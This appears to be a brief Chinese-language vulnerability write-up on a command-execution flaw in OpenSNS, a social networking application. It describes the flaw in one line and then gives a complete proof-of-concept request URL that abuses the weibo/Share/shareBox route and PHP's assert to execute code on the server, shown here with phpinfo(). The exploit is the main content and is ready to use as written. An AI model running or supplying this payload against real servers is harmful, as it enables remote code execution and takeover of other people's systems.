1.漏洞描述
OpenSNS是想天科技开发的一款综合性社交软件。 OpenSNS存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权限。
2.打开页面
3.构造poc
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()